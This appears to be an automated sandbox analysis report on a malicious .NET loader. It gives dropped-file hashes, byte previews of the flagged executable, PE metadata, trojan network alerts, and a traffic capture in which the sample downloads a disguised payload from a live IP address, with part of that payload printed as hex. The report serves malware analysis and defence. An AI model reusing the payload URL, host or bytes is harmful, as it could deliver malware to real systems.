                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                  Category:dropped
                                                                  Size (bytes):94208
                                                                  Entropy (8bit):1.2891393435168748
                                                                  Encrypted:false
                                                                  SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                  MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                  SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                  SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                  SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):3.9223154746791433
                                                                  Encrypted:false
                                                                  SSDEEP:96:4Mpiii13IvUthN9COsR/jaUF/oAmhftQ8Sxxxxr1yFzuzVzdWzizx0zgz8yuzH+n:hhC3IvULPCOujXHmo8ng7LKPisdk
                                                                  MD5:4FF4A281A08A0681597794A3024FB584
                                                                  SHA1:D3A70362B238B82DB1EF1AEFEF920AFEDF717880
                                                                  SHA-256:A6DB7E8C70ADC90B74C0F08503F49CF041D79AFED3B916676892725CE2DBCCE0
                                                                  SHA-512:9EDE8EEA5CB5E07187300C221BB9312DCD63E96F10B44697A50BEBF02F18A793B67FAB05A990C48DBDEF32264C89F5C0D0FA553609E2F2191009AF138C42DDB8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.,c.....................J......./... ...@....@.. ....................................@.................................(/..W....@..hG........................................................................... ............... ..H............text........ ...................... ..`.rsrc...hG...@...H..................@..@.reloc...............Z..............@..B................d/......H........"..|............................................................0..K.......(....r...po.....-.&s.....-.&..-.&+ .+..+..+.......i]....a.o......X....i2..*..0.............-.&(....+.&+.*...ns....%(....(....o....o....*.0..;.......s.....-/&.(.....o....t....r!..po.....o.........o.....+..+.*..0..M.......s....%(....o.........o....%(....o....(...+.o....t)...rs..p .......o!...o....*....0.............,.&(....+.&+.*....0..........(....o"....-.&+.(#...+.*.0.............-.&(....+.&+.
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):3.9223154746791433
                                                                  Encrypted:false
                                                                  SSDEEP:96:4Mpiii13IvUthN9COsR/jaUF/oAmhftQ8Sxxxxr1yFzuzVzdWzizx0zgz8yuzH+n:hhC3IvULPCOujXHmo8ng7LKPisdk
                                                                  MD5:4FF4A281A08A0681597794A3024FB584
                                                                  SHA1:D3A70362B238B82DB1EF1AEFEF920AFEDF717880
                                                                  SHA-256:A6DB7E8C70ADC90B74C0F08503F49CF041D79AFED3B916676892725CE2DBCCE0
                                                                  SHA-512:9EDE8EEA5CB5E07187300C221BB9312DCD63E96F10B44697A50BEBF02F18A793B67FAB05A990C48DBDEF32264C89F5C0D0FA553609E2F2191009AF138C42DDB8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.,c.....................J......./... ...@....@.. ....................................@.................................(/..W....@..hG........................................................................... ............... ..H............text........ ...................... ..`.rsrc...hG...@...H..................@..@.reloc...............Z..............@..B................d/......H........"..|............................................................0..K.......(....r...po.....-.&s.....-.&..-.&+ .+..+..+.......i]....a.o......X....i2..*..0.............-.&(....+.&+.*...ns....%(....(....o....o....*.0..;.......s.....-/&.(.....o....t....r!..po.....o.........o.....+..+.*..0..M.......s....%(....o.........o....%(....o....(...+.o....t)...rs..p .......o!...o....*....0.............,.&(....+.&+.*....0..........(....o"....-.&+.(#...+.*.0.............-.&(....+.&+.
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1572864
                                                                  Entropy (8bit):4.2885780282691135
                                                                  Encrypted:false
                                                                  SSDEEP:12288:vO9cbh3B/ajZn88nAxgqSZsAHrxAESy7QNFiOOhEpnAWoluGHpa27fia:29cbh3B/ajZ88nUgjOvV
                                                                  MD5:8E05E7F43676C7E7554CE400BB3708D2
                                                                  SHA1:4BFD88B7A40EFF41007CE1E33F4BEA7D17EF99FF
                                                                  SHA-256:4D2A709CA2517D6452FB2C75A23C608AB08E54B00BE1BD9019897C799341B5BD
                                                                  SHA-512:23D14481F9F5FAE202779C9528252D73B14CE587D12641557C2B0A343C58B47B7D5794B1D5352714C3F80F0D8F6DED4D1AB32A7FCD893E83F0500D96A89410EF
                                                                  Malicious:false
                                                                  Preview:regf^...^...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.l.b]..................................................................................................................................................................................................................................................................................................................................................?........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):24576
                                                                  Entropy (8bit):3.7766688936339796
                                                                  Encrypted:false
                                                                  SSDEEP:384:GH5/+allFBA+Pe6rIpnQ86TVgGZu+DODvkZgeh/y:GZ/+allPA+RSQ8gVgGUhDvMh/
                                                                  MD5:E25D54B2C0B8D3662545B661024A269D
                                                                  SHA1:42B614D849D974FF11E3FC3AC2EC7251D1620066
                                                                  SHA-256:EA05F2F80A0815A762DF50342CB6DDC664BE2B94FE0A7810EEABEF3F69A55745
                                                                  SHA-512:FCA9852FE0B5F73C9C174041458FA5ADA9D69637AB0FF4F7C2E558F79F8D2863CC0F03A5A1E735E74D26DFB2E39D7B638109BE0FEEB6B4817F5380C93AA6321B
                                                                  Malicious:false
                                                                  Preview:regf]...]...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.l.b]..................................................................................................................................................................................................................................................................................................................................................?HvLE.^......]...........h~.">.a....%p_............................. ..hbin................p.\..,..........nk,....b]................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....b]....... ........................... .......Z.......................Root........lf......Root....nk ....b]....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck...
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):3.9223154746791433
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:BPL_1000572_007.bat.exe
                                                                  File size:23552
                                                                  MD5:4ff4a281a08a0681597794a3024fb584
                                                                  SHA1:d3a70362b238b82db1ef1aefef920afedf717880
                                                                  SHA256:a6db7e8c70adc90b74c0f08503f49cf041d79afed3b916676892725ce2dbcce0
                                                                  SHA512:9ede8eea5cb5e07187300c221bb9312dcd63e96f10b44697a50bebf02f18a793b67fab05a990c48dbdef32264c89f5c0d0fa553609e2f2191009af138c42ddb8
                                                                  SSDEEP:96:4Mpiii13IvUthN9COsR/jaUF/oAmhftQ8Sxxxxr1yFzuzVzdWzizx0zgz8yuzH+n:hhC3IvULPCOujXHmo8ng7LKPisdk
                                                                  TLSH:54B2B5D223945D2BF8A79978E4B36E5308B4660DCE029B1E38F3394ACE60DDC356479D
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.,c.....................J......./... ...@....@.. ....................................@................................
                                                                  Icon Hash:5d1b136664165369
                                                                  Entrypoint:0x402f82
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x632C1756 [Thu Sep 22 08:05:42 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2f28           0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x4000           0x4768        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xf88         0x1000    False     0.563720703125      data       5.374029477198112    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x4000           0x4768        0x4800    False     0.1265190972222222  data       3.0679650449494593   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xa000           0xc           0x200     False     0.044921875         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA     Size    Type                                                                                           Language  Country
RT_ICON        0x4130  0x4028  data
RT_GROUP_ICON  0x8158  0x14    data
RT_VERSION     0x816c  0x448   data
RT_MANIFEST    0x85b4  0x1b4   XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                          Source Port  Dest Port  Source IP    Dest IP
09/23/22-07:59:51.380310  TCP       2034631  ET TROJAN Maldoc Activity (set)  49707        80         192.168.2.6  185.252.178.63
09/23/22-08:01:54.005892  TCP       2034631  ET TROJAN Maldoc Activity (set)  49712        80         192.168.2.6  185.252.178.63
09/23/22-08:02:01.550542  TCP       2034631  ET TROJAN Maldoc Activity (set)  49715        80         192.168.2.6  185.252.178.63
09/23/22-08:01:29.985260  TCP       2034631  ET TROJAN Maldoc Activity (set)  49710        80         192.168.2.6  185.252.178.63
09/23/22-08:01:37.884830  TCP       2034631  ET TROJAN Maldoc Activity (set)  49711        80         192.168.2.6  185.252.178.63
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Sep 23, 2022 07:59:51.344363928 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.372694016 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.372813940 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.380310059 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.421509981 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.421602011 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.421665907 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.421688080 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.421730042 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.421777010 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.421788931 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.421850920 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.421886921 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.421907902 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.421964884 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.422000885 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.422025919 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.422085047 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.422120094 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.450649023 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.450762987 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.450793982 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.450815916 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.450849056 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.450851917 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.450880051 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.450881958 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.450912952 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.450917959 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.450941086 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.450968027 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.450973034 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.450995922 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451024055 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451030970 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.451052904 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451081038 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451086998 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.451108932 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451137066 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451143026 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.451164007 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451190948 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451200008 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.451220036 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451246977 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451257944 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.451276064 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.451311111 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.482064962 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.482139111 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.482182980 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.482199907 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.482227087 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.482270002 CEST  80           49707      185.252.178.63  192.168.2.6
Sep 23, 2022 07:59:51.482270956 CEST  49707        80         192.168.2.6     185.252.178.63
Sep 23, 2022 07:59:51.482312918 CEST  80           49707      185.252.178.63  192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482355118 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482362032 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482394934 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482429981 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482439041 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482480049 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482522011 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482527018 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482573032 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482610941 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482614994 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482656956 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482692957 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482697010 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482737064 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482772112 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482777119 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482816935 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482851028 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482856989 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482898951 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482934952 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.482937098 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.482976913 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483011007 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483015060 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483053923 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483093023 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483093977 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483133078 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483167887 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483175039 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483217001 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483251095 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483257055 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483295918 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483331919 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483335972 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483423948 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483464956 CEST4970780192.168.2.6185.252.178.63
                                                                  Sep 23, 2022 07:59:51.483467102 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483506918 CEST8049707185.252.178.63192.168.2.6
                                                                  Sep 23, 2022 07:59:51.483540058 CEST4970780192.168.2.6185.252.178.63
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 23, 2022 08:01:19.545746088 CEST | 58595 | 53 | 192.168.2.6 | 8.8.8.8
Sep 23, 2022 08:01:19.563647985 CEST | 53 | 58595 | 8.8.8.8 | 192.168.2.6

DNS queries:
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 23, 2022 08:01:19.545746088 CEST | 192.168.2.6 | 8.8.8.8 | 0xe558 | Standard query (0) | showip.net | A (IP address) | IN (0x0001) | false

DNS answers:
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 23, 2022 08:01:19.563647985 CEST | 8.8.8.8 | 192.168.2.6 | 0xe558 | No error (0) | showip.net | | 162.55.60.2 | A (IP address) | IN (0x0001) | false
                                                                  • 185.252.178.63
                                                                  • showip.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49707 | 185.252.178.63 | 80 | C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Timestamp | kBytes transferred | Direction | Data
Sep 23, 2022 07:59:51.380310059 CEST | 99 | OUT | GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
Host: 185.252.178.63
Connection: Keep-Alive
Sep 23, 2022 07:59:51.421509981 CEST | 101 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 05:59:51 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png
                                                                  Data Raw: 1e 22 f6 68 76 74 76 69 6e 63 70 72 93 9e 64 53 c0 66 68 75 74 76 69 6a 23 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 d3 78 66 68 7b 6b cc 67 6a d7 79 bf 4d d9 65 1f b5 47 3c 1d 1d 05 49 1a 11 1f 15 1e 00 09 73 1b 07 06 1b 1b 02 49 08 06 50 00 19 0f 44 3a 16 46 2c 3a 27 56 04 05 07 15 5c 61 6c 6e 77 78 66 68 75 74 76 69 3a 26 70 72 20 60 67 53 39 71 44 16 74 76 69 6a 63 70 72 6c 81 64 5d 59 6d 69 73 74 76 85 61 63 70 74 6c 61 64 53 78 66 ee 7f 78 76 69 4a 63 70 72 4c 6d 64 53 78 26 68 75 54 76 69 6a 61 70 72 68 61 64 53 78 66 68 75 70 76 69 6a 63 70 72 6c 61 04 5f 78 66 6a 75 74 76 69 6a 63 73 72 2c e4 64 53 68 66 68 65 74 76 69 6a 73 70 72 7c 61 64 53 78 66 68 65 74 76 69 6a 63 70 72 6c 61 64 53 54 6c 64 75 23 76 69 6a 63 50 7e 6c 35 67 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 35 78 76 65 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 73 78 66 60 75 74 76 69 6a 63 70 72 6c 61 64 5b 58 66 68 3d 74 76 69 6a 63 70 72 6c 61 64 53 56 12 0d 0d 00 76 69 6a ef 9a 79 6c 61 44 53 78 66 84 7e 74 76 6b 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 49 6a 63 10 5c 1e 12 16 30 78 66 68 21 77 76 69 6a 43 7c 72 6c 65 64 53 78 88 63 75 74 76 69 6a 63 70 72 6c 61 64 53 78 26 68 75 34 58 1b 0f 0f 1f 11 6c 61 68 53 78 66 68 35 78 76 69 68 63 70 72 9e 6a 64 53 78 66 68 75 74 76 69 6a 63 70 72 2c 61 64 11 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 0e 62 79 74 76 69 6a 63 38 72 6c 61 66 53 7d 66 4c 14 7e 76 61 c3 62 70 73 6c 61 64 53 78 66 68 fd 03 74 69 f6 8a 77 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 6a 5a 6a 70 65 6c 61 64 53 78 66 68 63 58 73 7f 46 6a 5b 7c 44 63 64 53 7e 4d 9c 5d 6c 76 69 6c 48 70 58 6c 67 4e 53 78 65 58 7f 74 67 69 6a 63 70 
72 6c 61 66 45 6e 4a 60 53 5c 68 69 6a 69 5b 71 4a 4a 92 79 78 66 68 76 44 7d 69 0f 63 70 72 6c 61 64 53 7a 4e 76 75 74 7c 6a 47 65 03 6d 6c 61 6e 29 7b 09 4d 70 74 70 45 6c 10 50 72 6c 6b 1e 51 7b 73 45 58 52 50 6b 69 0c 57 77 6c 67 e9 42 78 66 69 62 59 55 4f 4c 61 72 5a 6a 61 64 55 61 4b 76 53 52 74 6b 42 64 70 72 6a 1c 60 53 78 62 43 60 09 77 69 6a 67 5b bc 11 63 64 53 7c 4d b0 08 77 76 69 6e 48 ad 58 6c 61 64 50 48 6c 68 63 74 76 69 6a 63 70 72 6e 79 7a 7e 75 40 13 74 74 76 6d 05 45 75 72 6a 4a 67 75 53 97 42 75 74 75 59 60 63 69 72 6c 61 64 53 78 66 6a 69 6f 5b 79 4c 18 71 72 6c 65 0b 74 7d 66 6e 6a 7e 2f 42 69 45 5b 9c 46 61 64 53 7b 56 62 75 65 76 69 6a 63 70 72 6c 63 7c 46 55 6e 4e 0e 77 76 69 6e 48 73 54 47 97 4e 53 78 66 6b 45 7e 76 78 6a 63 70 72 6c 61 64 51 62 7b 45 7d 52 0d 6d 6a 63 74 59 6f 47 4f a5 52 66 68 75 77 46 63 6a 49 70 72 6c 61 64 53 78 64 7e 60 59 6d 4f 69 75 66 5e 74 47 60 4e 60 4b 7d 53 71 78 6d 64 66 7e 74 44 6a 64 53 7e 4d 61 53 5f 95 4f 41 85 56 59 85 4b 64 53 6b 56 63 75 0b 76 69 6a 62 70 72 7d 63 1f 52 78 66 6c 1a 53 73 69 6c 7f 5d 37 4a 63 1f 51 78 66 6c 62 59 48 4f 68 18 71 72 6c 65 67 57 7d 61 7e
